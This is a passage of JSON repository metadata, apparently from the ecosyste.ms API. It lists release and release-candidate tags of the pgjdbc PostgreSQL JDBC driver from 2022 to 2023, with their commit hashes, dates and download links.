EL42.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4/manifests"},{"name":"REL42.5.4-rc1","sha":"051ae1b75a08a695ce1f96bcea7ce7ca49f798c9","kind":"tag","published_at":"2023-02-16T14:26:33.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4-rc1/manifests"},{"name":"REL42.5.3","sha":"976b27b5efce6486cc9d6330561184e875dbde53","kind":"tag","published_at":"2023-02-03T15:23:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3/manifests"},{"name":"REL42.5.3-rc2","sha":"976b27b5efce6486cc9d6330561184e875dbde53","kind":"tag","published_at":"2023-02-03T15:19:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.3-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.3-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.3-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc2/manifests"},{"name":"REL42.5.3-rc1","sha":"d2f77a26815e7994db7ac4d816d29d6d7395418d","kind":"tag","published_at":"2023-02-03T15:07:22.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc1/manifests"},{"name":"REL42.5.2-rc2","sha":"50dc6bc28f3da47d392d824887e92e51012f7fbc","kind":"tag","published_at":"2023-02-01T13:20:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc2/manifests"},{"name":"REL42.5.2","sha":"50dc6bc28f3da47d392d824887e92e51012f7fbc","kind":"commit","published_at":"2023-01-31T20:40:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2/manifests"},{"name":"REL42.5.2-rc1","sha":"e7239c1f8e1f8757fbe3b50ba4c967ea85cdf12e","kind":"tag","published_at":"2023-01-13T20:43:25.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc1/manifests"},{"name":"REL42.5.1","sha":"9008dc9aade6dbfe4efafcd6872ebc55f4699cf5","kind":"tag","published_at":"2022-11-23T14:36:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1/manifests"},{"name":"REL42.5.1-rc1","sha":"9008dc9aade6dbfe4efafcd6872ebc55f4699cf5","kind":"tag","published_at":"2022-11-23T14:32:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1-rc1/manifests"},{"name":"REL42.4.3","sha":"34855cffb9079edf95cf77930f3e3b73f6a1b139","kind":"tag","published_at":"2022-11-23T14:02:53.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3/manifests"},{"name":"REL42.4.3-rc1","sha":"34855cffb9079edf95cf77930f3e3b73f6a1b139","kind":"tag","published_at":"2022-11-23T13:58:08.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.3-rc1/manifests"},{"name":"REL42.3.8","sha":"e73c6b6b53ff11bc0bd06c44130a880d3bf77c55","kind":"tag","published_at":"2022-11-23T13:47:42.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.8","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8/manifests"},{"name":"REL42.3.8-rc1","sha":"e73c6b6b53ff11bc0bd06c44130a880d3bf77c55","kind":"tag","published_at":"2022-11-23T13:37:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.8-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.8-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.8-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.8-rc1/manifests"},{"name":"REL42.2.27","sha":"91b8c2ca600f82d2ec47c3fb54ca2036b000e320","kind":"tag","published_at":"2022-11-23T13:33:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.27","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27/manifests"},{"name":"REL42.2.27-rc1","sha":"91b8c2ca600f82d2ec47c3fb54ca2036b000e320","kind":"tag","published_at":"2022-11-23T13:30:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.27-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.27-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.27-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.27-rc1/manifests"},{"name":"REL42.3.7","sha":"0afaa71d5254804f8bab7caab96735c5f7d11aa1","kind":"tag","published_at":"2022-09-06T12:53:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.7","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7/manifests"},{"name":"REL42.3.7-rc1","sha":"0afaa71d5254804f8bab7caab96735c5f7d11aa1","kind":"tag","published_at":"2022-09-06T12:43:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.7-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.7-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.7-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.7-rc1/manifests"},{"name":"REL42.5.0","sha":"f490edf94bddc103c291b9429f8a63275d64e4ea","kind":"tag","published_at":"2022-08-24T17:25:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0/manifests"},{"name":"REL42.5.0-rc1","sha":"f490edf94bddc103c291b9429f8a63275d64e4ea","kind":"tag","published_at":"2022-08-24T17:11:15.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.0-rc1/manifests"},{"name":"REL42.4.2","sha":"389be0a6e61c42bf65bb2974f5f1664bf7d8db8c","kind":"tag","published_at":"2022-08-17T15:39:01.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2/manifests"},{"name":"REL42.4.2-rc1","sha":"389be0a6e61c42bf65bb2974f5f1664bf7d8db8c","kind":"tag","published_at":"2022-08-17T15:22:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.2-rc1/manifests"},{"name":"REL42.2.26","sha":"b5ee575b7d6e0918a58fe533f6c50b0c7e9f73c0","kind":"tag","published_at":"2022-08-03T13:21:52.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.26","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26/manifests"},{"name":"REL42.2.26-rc2","sha":"b5ee575b7d6e0918a58fe533f6c50b0c7e9f73c0","kind":"tag","published_at":"2022-08-03T13:20:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.26-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.26-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.26-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc2/manifests"},{"name":"REL42.2.26-rc1","sha":"b5ee575b7d6e0918a58fe533f6c50b0c7e9f73c0","kind":"tag","published_at":"2022-08-03T13:16:54.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.26-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.26-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.26-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.26-rc1/manifests"},{"name":"REL42.4.1","sha":"bd91c4cc76cdfc1ffd0322be80c85ddfe08a38c2","kind":"tag","published_at":"2022-08-03T13:14:28.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1/manifests"},{"name":"REL42.4.1-rc1","sha":"bd91c4cc76cdfc1ffd0322be80c85ddfe08a38c2","kind":"tag","published_at":"2022-08-03T12:58:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.1-rc1/manifests"},{"name":"REL42.4.0","sha":"09166bdf724b9a869520a75bfd44716b7af8db2d","kind":"tag","published_at":"2022-06-09T15:58:25.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0/manifests"},{"name":"REL42.4.0-rc1","sha":"09166bdf724b9a869520a75bfd44716b7af8db2d","kind":"tag","published_at":"2022-06-09T14:55:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.0-rc1/manifests"},{"name":"REL42.3.6","sha":"7714d035b2123bbf5e5461d3ea162af946191941","kind":"tag","published_at":"2022-05-24T13:19:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6/manifests"},{"name":"REL42.3.6-rc1","sha":"7714d035b2123bbf5e5461d3ea162af946191941","kind":"tag","published_at":"2022-05-24T13:11:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.6-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.6-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.6-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.6-rc1/manifests"},{"name":"REL42.3.5","sha":"0d6ccb194a94cebe1cc0add461382b91f13c2a4a","kind":"tag","published_at":"2022-05-04T15:41:59.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5/manifests"},{"name":"REL42.3.5-rc1","sha":"0d6ccb194a94cebe1cc0add461382b91f13c2a4a","kind":"tag","published_at":"2022-05-04T14:50:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.5-rc1/manifests"},{"name":"REL42.3.4","sha":"b4a9346c1b0089c04eb448224ab8fbfcae586450","kind":"tag","published_at":"2022-04-15T18:48:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4/manifests"},{"name":"REL42.3.4-rc1","sha":"b4a9346c1b0089c04eb448224ab8fbfcae586450","kind":"tag","published_at":"2022-04-15T18:02:03.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.4-rc1/manifests"},{"name":"REL42.3.3","sha":"9effea487dca529dc5cb0e71600a8c6509819c56","kind":"tag","published_at":"2022-02-15T19:24:12.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3/manifests"},{"name":"REL42.3.3-rc1","sha":"9effea487dca529dc5cb0e71600a8c6509819c56","kind":"tag","published_at":"2022-02-15T19:07:20.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.3-rc1/manifests"},{"name":"REL42.2.25","sha":"6f64a38627c12f8b515c8862682572cd1aff0ff8","kind":"tag","published_at":"2022-02-01T20:20:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.25","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25/manifests"},{"name":"REL42.2.25-rc1","sha":"6f64a38627c12f8b515c8862682572cd1aff0ff8","kind":"tag","published_at":"2022-02-01T20:17:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.25-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.25-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.25-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.25-rc1/manifests"},{"name":"REL42.3.2-rc2","sha":"728c04ee8d26dcc4bca51503c2e93ad87ef8ce87","kind":"tag","published_at":"2022-02-01T14:52:13.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2-rc2/manifests"},{"name":"REL42.3.2","sha":"728c04ee8d26dcc4bca51503c2e93ad87ef8ce87","kind":"commit","published_at":"2022-02-01T14:47:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.2/manifests"},{"name":"REL42.3.2-rc1","sha":"cfc4b1106b8f4931dee8241671c3880f5f947727","kind":"tag","published_at":"2022-01-31T19:31:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjd